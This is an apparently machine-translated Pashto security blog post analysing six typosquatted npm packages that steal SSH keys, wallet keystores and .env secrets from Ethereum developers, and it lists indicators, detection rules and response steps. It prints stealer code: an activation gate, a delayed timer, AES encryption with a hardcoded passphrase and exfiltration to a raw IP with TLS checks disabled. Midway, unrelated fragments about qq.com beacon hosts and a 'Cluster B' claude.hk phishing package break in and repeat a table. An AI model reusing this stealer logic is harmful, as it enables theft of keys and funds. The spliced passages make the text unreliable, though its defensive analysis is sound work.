د EVMDeFi npm ټایپوسکاټینګ برید د پراختیا کونکو کیلي غلا کوي

د EVM/DeFi npm ټایپوسکویټینګ برید د پراختیا کونکو کیلي غلا کوي

د تمديد؛ DR

د می په ۶مه، ۲۰۲۶، د npm یو واحد خپرونکی، namikazesarada010206، شپږ ناوړه کڅوړې یې وغځولې چې ایتیریم، سولیډیټي، او ډی فای پراختیا کونکي ایکوسیستم یې په نښه کاوه.

کڅوړې، viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils، او web3-utils-core، د مشهور ویب 3 وسیلو لپاره د مرستندویه کتابتونونو په څیر ډیزاین شوي معقول نومونه کارول شوي.

ټولو شپږو کڅوړو کې یو شان وو telemetry.js فایل. فایل د کلستر په اوږدو کې د بایټ سره ورته و، د SHA-256 سره:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

مالویر د نصبولو په وخت کې نه اجرا کیږي. نشته preinstall or postinstall هک. پرځای یې، دا فعال کیږي کله چې بسته د require().

دا تفصیل مهم دی.

امپلانټ تر هغه وخته پورې انتظار کوي چې یو پراختیا کونکی په حقیقت کې دا بسته وکاروي. بیا دا ګوري چې ایا ورک سټیشن د ریښتیني ایتیریم / سولیډیټي پراختیا چاپیریال په څیر ښکاري. دا د کیمیا یا انفورا کیلي، شخصي کیلي، یادونو، ډیپلویر کیلي، یا د محلي فاؤنډري لارښود لپاره ګوري.

که کوربه سره سمون خوري، غلا کوونکی د SSH شخصي کیلي، فاؤنډري / ګیت / براوني والټ کیلي پلورنځي راټولوي، .env* فایلونه، او حساس چاپیریال متغیرات. دا بنډل د AES-256-GCM سره د هارډ کوډ شوي پاسفریج په کارولو سره کوډ کوي او د TLS تایید غیر فعالولو سره یې خام IPv4 C2 پای ټکي ته خپروي.

د زیګیني د مالویر لومړني خبرداري (MEW) سیسټم ټول شپږ پیکجونه د ناوړه په توګه تایید کړل. د npm راجسټری لرې کولو راپور بنډل په تمه دی.

کلستر: شپږ کڅوړې، یو خپرونکی

د خپرونکي حساب namikazesarada010206 د نا تایید شوي Gmail پتې سره تړل شوی و namikazesarada010206@gmail.com.

دا کمپاین د ۲۰۲۶ کال د می په ۶مه د یوې ورځې خپرونې په توګه راڅرګند شو. ټولې شپږ کڅوړې په لاندې ډول نسخې شوې وې: 1.0.0، د صفر رن ټایم انحصار درلود، او یوازې درې فایلونه یې لیږلي وو:

package.json index.js telemetry.js

دوی د ورته سرچینې ذخیره هم اعلان کړه:

https://github.com/harunosakura030303-maker/evmchain-config

لومړني درې کڅوړې د لومړي خپرونې په وخت کې د MEW سکینرونو لخوا ونیول شوې. پاتې درې یې د خپرونکي د npm پروفایل د شنونکي بیاکتنې وروسته په زور سره بیرغ شوي. یوځل ورته بایټ ورته telemetry.js په ټول کلستر کې تایید شوي، دوی د تسلسل له مخې د ناوړه په توګه تړل شوي وو.

هګ نسخه npm خپور شو د MEW ټکټ حکم
ویم کور 1.0.0 2026-05-06 01:38:44Z #51049 ناوړه
د ویم-یوټیلز-کور 1.0.0 2026-05-06 #51050 ناوړه
د هارډ هیټ کور کارونې 1.0.0 2026-05-06 #51051 ناوړه
د ای وی ایم کارول 1.0.0 2026-05-06 #51069 ناوړه، په دوامداره توګه
د فاونډري کارونې 1.0.0 2026-05-06 #51071 ناوړه، په دوامداره توګه
web3-utils-core د 1.0.0 2026-05-06 #51070 ناوړه، په دوامداره توګه

د نوم ورکولو ستراتیژي ساده خو اغیزمنه ده.

دا کڅوړې دقیق نومونه نه تقلید کوي. پرځای یې، دوی د "ګټورتیا" ضمیمې کاروي لکه -core, -utils، او -utils-core. دا دوی د ملګرو کتابتونونو په څیر ښکاري چې یو پراختیا کونکی یې د ویب 3 وسیلو سره نږدې د لیدلو تمه کولی شي.

ناوړه بسته مشروع هدف
ویم کور ویم، د ایتیریم ټایپ سکریپټ یو مشهور پیرودونکی
د ویم-یوټیلز-کور وايم
د هارډ هیټ کور کارونې هارډ هیټ، د سولیډیټي پراختیا یو عام چاپیریال
د ای وی ایم کارول د EVM د وسیلې عمومي نوم ځای
د فاونډري کارونې فاونډري، د سولیډیټي وسیلو زنځیر
web3-utils-core د web3-utils، Web3.js مرسته کوونکي

دا د "اضافي کڅوړې" نمونه ده: نه "زه اصلي کڅوړه یم،" بلکې "زه د اصلي کڅوړې شاوخوا یو معقول مرسته کوونکی ښکاري."

د DeFi پراختیا کونکو لپاره چې ګړندي حرکت کوي، دا د خطر رامینځته کولو لپاره کافي دي.

کله چې بسته وارد شي نو څه پیښیږي؟

د برید سلسله کوچنۍ، قصدي، او د کریپټو پراختیا چاپیریالونو باندې متمرکزه ده.

د نصبولو هک نشته. پرځای یې، په هر پیکج کې یو شامل دی index.js چې د سټب فعالیت صادروي ​​او بیا د ناوړه ټیلی میټري ماډل باروي.

require('./telemetry').init();

دا پدې مانا ده چې مالویر په لومړي واردولو سره فعال کیږي.

دا د برید کونکي لپاره په عملیاتي توګه ګټور دی. ډیری سکینرونه او سینڈ باکسونه د نصب کولو وخت چلند باندې تمرکز کوي. دا بسته تر هغه وخته پورې انتظار کوي چې دا په حقیقت کې د پراختیا کونکي، جوړونې سکریپټ، ازموینې سویټ، یا د چلولو وخت لارې لخوا کارول کیږي.

د فعالولو دروازه: یوازې په ریښتیني ویب 3 پراختیا کونکو کاري سټیشنونو کې اور لګیدلی

د امپلانټ تر ټولو مهمه برخه د فعالولو دروازه ده.

مالویر د چاپیریال متغیراتو لپاره چک کوي چې معمولا په ایتیریم / سولیډیټي پراختیا کونکي ماشینونو کې موندل کیږي:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

دا دا هم ګوري چې ایا فاؤنډري نصب شوی ښکاري:

fs.existsSync(path.join(os.homedir(), '.foundry'))

که چیرې هیڅ حالت ریښتیا نه وي، نو فعالیت بیرته راځي او هیڅ نه کوي.

دا په عمومي تحلیلي چاپیریال کې بسته خاموشه کوي. د فاؤنډري، کیمیا کیلي، انفورا کیلي، شخصي کیلي، یا یادونو پرته یو سینڈ باکس ممکن بې ضرره ښکاري واردات وګوري.

په یوه مطابقت لرونکي کوربه کې، مالویر د راټولولو دمخه له 60 څخه تر 90 ثانیو پورې انتظار کوي:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ځنډ د وارداتو او اخراج ترمنځ ښکاره اړیکه کموي. .unref() کال د کوربه پروسې ته اجازه ورکوي چې په نورمال ډول ووځي که چیرې بسته په لنډمهاله سکریپټ کې وارد شوې وي.

دا د شورماشور وهلو او نیولو چلند نه دی. دا یو هدفمند غلا کوونکی دی چې د چلولو څخه د مخنیوي لپاره ډیزاین شوی پرته لدې چې د پراختیا کونکي چاپیریال د غلا کولو ارزښت ولري.

هغه څه چې غلا کوونکي راټولوي

کله چې د فعالولو دروازه تېره شي، مالویر له هغو سرچینو څخه راټولوي چې د ویب 3 پراختیا کې خورا مهم دي: شخصي کیلي، د والټ کیسټورونه، د ځای پرځای کولو اسناد، کلاوډ رازونه، د npm ټوکنونه، او د محلي پروژې ترتیب.

سرچینه څه راټول شوي دي
پروسه.این وی هر متغیر مطابقت /ټوکن|پټ|کلیدي|پاس|لیک|شخصي|تخم|یادونه|یادونه|AWS|NPM|ځای پرځای کول/i
~/.ssh/* هغه فایلونه چې PRIVATE KEY یا BEGIN OPENSH لري، د بشپړ فایل مینځپانګې په ګډون
~/.فاؤنډري/کليزي پلورنځي/* د فاؤنډري والټ کیسټور فایلونه
~/.اتیریم/کلیستور/* د ګیت والټ کیسټور فایلونه
~/.براوني/اکاؤنټونه/* د براوني والټ کیسټور فایلونه
${cwd}/.env د بشپړ فایل منځپانګه
${cwd}/.env.local د بشپړ فایل منځپانګه
${cwd}/.env.production د بشپړ فایل منځپانګه
${cwd}/.env.development د بشپړ فایل منځپانګه
د کوربه نوم () کوربه میټاډاټا
کریپټو.ناڅاپي UUID() د قرباني/غونډې پیژندونکی
نیټه.اوس() د راټولولو وخت ټاپه
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

د ATTA ټوکنونه دا دي:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

موږ نشو کولی دا تایید کړو چې ټیلی میټري د آپریټر خپل تحلیل و یا په جلا توګه د پیسو چینل. د ATTA ټوکنونه په دواړو نمونو کې یو شان دي چې موږ یې معاینه کړې.

کلستر ب: هیبای

claude.hk OAuth فشینګ + ANTHROPIC_BASE_URL تښتول

د اپریل د لومړۍ نیټې نمونه د کمپاین تر ټولو بې رحمه او پخوانۍ برخه ده.

heibai:2.1.88-claude.hk-4 لخوا خپور شو wuguoqiangvip28، یو حساب چې د جون په ۷، ۲۰۲۵ کې جوړ شو. دا کڅوړه په ښکاره ډول د مشروع خلاف بڼه لري 2.1.88 انتروپیک خوشې کول.

دا د CA-cert MITM سره هیڅ ستونزه نلري. پرځای یې، دا د OAuth پای ټکی په اړه کارونکي ته دروغ وايي.

د افشا شوي کلاډ کوډ سرچینې په سر کې ناوړه اضافه کول پدې کې شامل دي:

سرچینه څه راټول شوي دي
پروسه.این وی هر متغیر مطابقت /ټوکن|پټ|کلیدي|پاس|لیک|شخصي|تخم|یادونه|یادونه|AWS|NPM|ځای پرځای کول/i
~/.ssh/* هغه فایلونه چې PRIVATE KEY یا BEGIN OPENSH لري، د بشپړ فایل مینځپانګې په ګډون
~/.فاؤنډري/کليزي پلورنځي/* د فاؤنډري والټ کیسټور فایلونه
~/.اتیریم/کلیستور/* د ګیت والټ کیسټور فایلونه
~/.براوني/اکاؤنټونه/* د براوني والټ کیسټور فایلونه
${cwd}/.env د بشپړ فایل منځپانګه
${cwd}/.env.local د بشپړ فایل منځپانګه
${cwd}/.env.production د بشپړ فایل منځپانګه
${cwd}/.env.development د بشپړ فایل منځپانګه
د کوربه نوم () کوربه میټاډاټا
کریپټو.ناڅاپي UUID() د قرباني/غونډې پیژندونکی
نیټه.اوس() د راټولولو وخت ټاپه

د هدف لیست خورا مشخص دی. دا د براوزر عمومي غلا یا پراخه اسناد سکریپ کول ندي. دا د هغو پراختیا کونکو لپاره دی چې د ایتیریم غوښتنلیکونه جوړوي، ازموینه کوي، ځای پر ځای کوي، یا چلوي.

د فاؤنډري، ګیت، او براوني کیسټورونو شاملول په ځانګړي ډول مهم دي. دا فایلونه کولی شي والټونو یا د ځای پرځای کولو پیژندنو ته مستقیم لاسرسی استازیتوب وکړي. که چیرې بریدګر دوی د پاسورډونو، یادونو، یا چاپیریال رازونو سره یوځای کړي، دوی ممکن د فنډونو لیږدولو، د ځای پرځای کونکو تقلید کولو، یا د سمارټ قرارداد عملیاتو سره جوړجاړی کولو توان ولري.

د اخراج څخه مخکې کوډ کول

مالویر راټول شوي معلومات د لیږلو دمخه کوډ کوي.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

هارډ کوډ شوی پاسفرېز دا دی:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

وروستی تادیه د JSON په توګه پوښل شوې ده:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

کوډ کول پخپله مالویر ډیر پرمختللی نه کوي. په هرصورت، دا د شبکې تفتیش سختوي. یو مدافع چې د وتلو څارنه کوي به د JSON پیلوډ وګوري، مګر غلا شوي کیلي، د والټ فایلونه، یا .env د هارډ کوډ شوي پاسفریج او ډیکریپشن منطق پرته محتويات.

خام IPv4 C2 ته اخراج

د اخراج لاره په سخت کوډ شوې ده:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

مالویر معلومات دې ته لیږي:

https://76.13.37.80:8443/api/v1/telemetry

دوه جزئیات څرګند دي.

لومړی، C2 د ډومین پرځای یو خام IPv4 پته ده. دا د ډومین راجسټریشن اړتیا لرې کوي او د ډومین پر بنسټ ځینې کشفونو څخه مخنیوی کوي.

دوهم، د TLS تایید د لاندې سره غیر فعال دی:

rejectUnauthorized: false

دا مالویر ته اجازه ورکوي چې هر ډول سند ومني، په شمول د ځان لاسلیک شوي سندونو. په بل عبارت، بریدګر د اعتبار وړ عامه سند ته اړتیا پرته کوډ شوی ټرانسپورټ ترلاسه کوي.

د بیا هڅې منطق او د فال بیک کوربه نشته. غلطۍ په خاموشۍ سره تیریږي. دا بسته خاموش ساتي که چیرې C2 آفلاین وي یا د لاسرسي وړ نه وي.

ولې دا کمپاین مهم دی

ډیری ناوړه npm کڅوړې چې هدف یې پراختیا کونکي دي پراخ اسناد تعقیبوي: npm ټوکنونه، AWS کیلي، GitHub ټوکنونه، یا .npmrc دوتنې

دا کمپاین هدف محدودوي.

دا د هغو نښو په لټه کې دی چې ماشین د ایتیریم یا سولیډیټي پراختیا کونکي پورې اړه لري. بیا دا په سمه توګه هغه شتمنۍ راوباسي چې په هغه چاپیریال کې مهم دي: د والټ کیسټورونه، شخصي کیلي، یادښتونه، د ډیپلویر کیلي، .env فایلونه، او SSH کیلي.

دا کمپاین د ویب 3 ټیمونو لپاره د عمومي npm غلا کونکي په پرتله ډیر خطرناک کوي.

یو بریالی انتان کولی شي ښکاره کړي:

  • د ځای پرځای کولو بټوې
  • د سمارټ قرارداد اداري کیلي
  • د RPC چمتو کونکي کیلي
  • د کلاوډ د ځای پرځای کولو اسناد
  • د npm خپرونې نښې
  • پراختیا ورکوونکي یا ساختماني زیربنا ته د SSH لاسرسی
  • د پروژې رازونه په کې ساتل شوي دي .env دوتنې
  • د فاؤنډري، ګیت، یا براوني لپاره د والټ کیلي پلورنځي

د پیکج نومونه هم روښانه ټولنیز انجینرۍ ښیي. دوی د پیژندل شویو وسیلو نومونو له لارې د ویب 3 پراختیا کونکي ایکوسیستم په نښه کوي: viem, hardhat, foundry, evm، او web3.

لوبغاړی اړتیا نلري چې د اصلي پروژو سره جوړجاړی وکړي. دوی یوازې یو پراختیا کونکي ته اړتیا لري ترڅو هغه څه نصب کړي چې د یو مناسب ملګري پیکج په څیر ښکاري.

د جوړجاړي او کشف شاخصونه

کڅوړې او خپرونکي
ساحوي ارزښت
د npm خپرونکی نامیکازیسردا010206
د خپرونکي برېښنالیک namikazesarada010206@gmail.com
برېښنالیک تایید شو نه
SCM تصديق شوی نه
د شهرت نمره 1.0
پيکيجز viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
بڼه ټول 1.0.0
د سرچینې ذخیره https://github.com/harunosakura030303-maker/evmchain-config
تایید شوی ناوړه ټول شپږ پیکجونه
شبکه
ډول ارزښت
د C2 پای ټکی https://76.13.37.80:8443/api/v1/telemetry
د C2 IP 76.13.37.80
د C2 پورټ 8443/tcp
د TLS چلند ردول غیر مجاز: غلط
د بار سکیما {"v":2,"iv": "د": "ټ": }
فایلونه او هېشونه
ډول ارزښت
ټیلی میټری.جۍ ایس ایچ اے-۲۵۶ 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
د بستې ترتیب package.json، index.js، telemetry.js
د فایلونو شمېر 3
نږدې ټول اندازه 3.4 KB

د فعالولو سیګنالونه

مالویر د دې چاپیریال متغیرونو لپاره ګوري:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

دا د دې لپاره هم ګوري:

~/.foundry/

په نښه شوي کوربه لارې

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

د ریجیکس ټولګه

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

د کشف یادښتونه

ډیری قوانین د دې کمپاین سره سمون لري پرته له دې چې بشپړ چلند تحلیل ته اړتیا ولري.

لومړی، د شپږو ناوړه پیکج نومونو لپاره د لاک فایلونه سکین کړئ:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

په کې کومه لوبه package-lock.json, yarn.lock, pnpm-lock.yaml، او یا node_modules تاریخ باید د یوې جدي پیښې په توګه وپیژندل شي.

دوهم، د Node.js پروسو لپاره څارنه چې د والټ کیسټور لارې لوستل کیږي:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

دا په ندرت سره د هغه بستې لپاره مشروع چلند دی چې د مرستندویه انحصار په توګه وارد شوي وي. دا په ځانګړي ډول شکمن وي کله چې د شبکې فعالیت وروسته بهر ته ځي.

دریم، د HTTPS اړیکو په اړه بلاک یا خبرداری ورکړئ:

76.13.37.80:8443

په ځانګړي توګه کله چې د غوښتنې لاره دا وي:

/api/v1/telemetry

څلورم، د npm پیکجونو لټون وکړئ چې دا ځانګړتیاوې سره یوځای کوي:

  • نوی یا ټیټ شهرت لرونکی خپرونکی
  • نا تایید شوی جي مېل حساب
  • د ویب ۳ سره نږدې د بسته نوم
  • د ذخیرې هیڅ معنی لرونکی تاریخ نشته
  • د کوچني پیکج ترتیب
  • index.js چې د ټیلی میټری یا مرستندویه فایل پورته کوي
  • د چلولو وخت پورې تړاو نشته
  • د حساس چاپیریال متغیر ټولګه
  • د والټ کیلي پلورنځي لاسرسی

دا نمونه د یو واحد IOC په پرتله ډیره ګټوره ده ځکه چې راتلونکی پیکج ممکن IP پته بدله کړي مګر ورته هدف منطق وساتي.

د جوړجاړي غبرګون چک لیست

که چیرې یو پراختیا کونکي د شپږو پیکجونو څخه یو کارولی وي او د دوی چاپیریال د فعالولو دروازې سره سمون ولري، نو د ورک سټیشن سره د جوړجاړي په توګه چلند وکړئ.

پدې کې هغه ماشینونه شامل دي چې د فاؤنډري نصب شوي وي، په چاپیریال کې د کیمیا یا انفورا کیلي، شخصي کیلي، یادښتونه، یا د ډیپلویر کیلي.

وړاندیز شوی ځواب:

  • کوربه له شبکې څخه جلا کړئ.
  • ساتل node_modules، لاک فایلونه، د شیل تاریخ، او د عدلي طب لپاره اړونده لاګونه.
  • هر SSH کیلي جوړه لاندې وګرځوئ ~/.ssh/.
  • د هر کیلي پلورنځي لپاره د والټ کیلي وګرځوئ لاندې ~/.foundry, ~/.ethereum، او ~/.brownie.
  • فنډونه نوي بټو ته انتقال کړئ.
  • هر راز چې په کې ساتل شوی وي وګرځوئ .env* په هغو زیرمو کې فایلونه چې پراختیا کونکي پکې کار کاوه.
  • د چاپیریال رازونه چې د ټولګې ریجیکس سره سمون خوري، په شمول د AWS کیلي، npm ټوکن، ډیپلای ټوکن، API کیلي، شخصي کیلي، تخمونه، او یادښتونه وګرځوئ.
  • د پلټنې کلاوډ، npm، GitHub، RPC چمتو کونکی، او د بلاکچین فعالیت له هغه وخته چې پیکج لومړی نصب شو.
  • د بیا کارولو دمخه د کارځای بیا انځور کړئ.

هغه څه چې مدافعین باید لرې کړي

دا کمپاین ښیي چې څنګه د لوړ ارزښت لرونکي پراختیا کونکي ایکوسیستمونو شاوخوا د npm ټایپوسکاټینګ وده کوي.

لوبغاړی استقامت ته اړتیا نه درلوده. دوی ابهام ته اړتیا نه درلوده. دوی حتی د نصب وخت اجرا کولو ته اړتیا نه درلوده.

پرځای یې، دوی په دریو شیانو تکیه وکړه:

  • د ویب ۳ د پیکجونو د منلو وړ نومونه
  • یوازې په ریښتیني کریپټو-پراختیا ماشینونو کې فعالول
  • د هغو فایلونو او رازونو مستقیم غلا چې د ایتیریم پراختیا کونکو لپاره خورا مهم دي

دا کمپاین په پراخه کچه د پلټنې له لاسه ورکول اسانه کوي او کله چې په سم چاپیریال کې راشي نو خطرناک وي.

د ویب ۳ ټیمونو لپاره، درس روښانه دی: د انحصار نومونو سره د خپل ګواښ ماډل د یوې برخې په توګه چلند وکړئ. یو بسته چې د بې ضرره مرستندویه په څیر ښکاري لاهم کولی شي د والټ جوړجاړي لپاره ترټولو لنډه لاره شي.

د npm راجستر ته راپور ورکړل شوی. موږ به دا پوسټ تازه کړو کله چې د خپرونکي حساب او کڅوړې لرې شي.

د سکا-وسایل-سافټویر-ترکیب-تحلیل-وسایل
د خپل سافټویر خطرونو ته لومړیتوب ورکړئ، اصلاح یې کړئ او خوندي یې کړئ
خپل وړیا حساب ترلاسه کړئ.
هیڅ کریډیټ کارت ته اړتیا نشته.

د خپل سافټویر پراختیا او تحویلي خوندي کړئ

د زیګیني محصول سویټ سره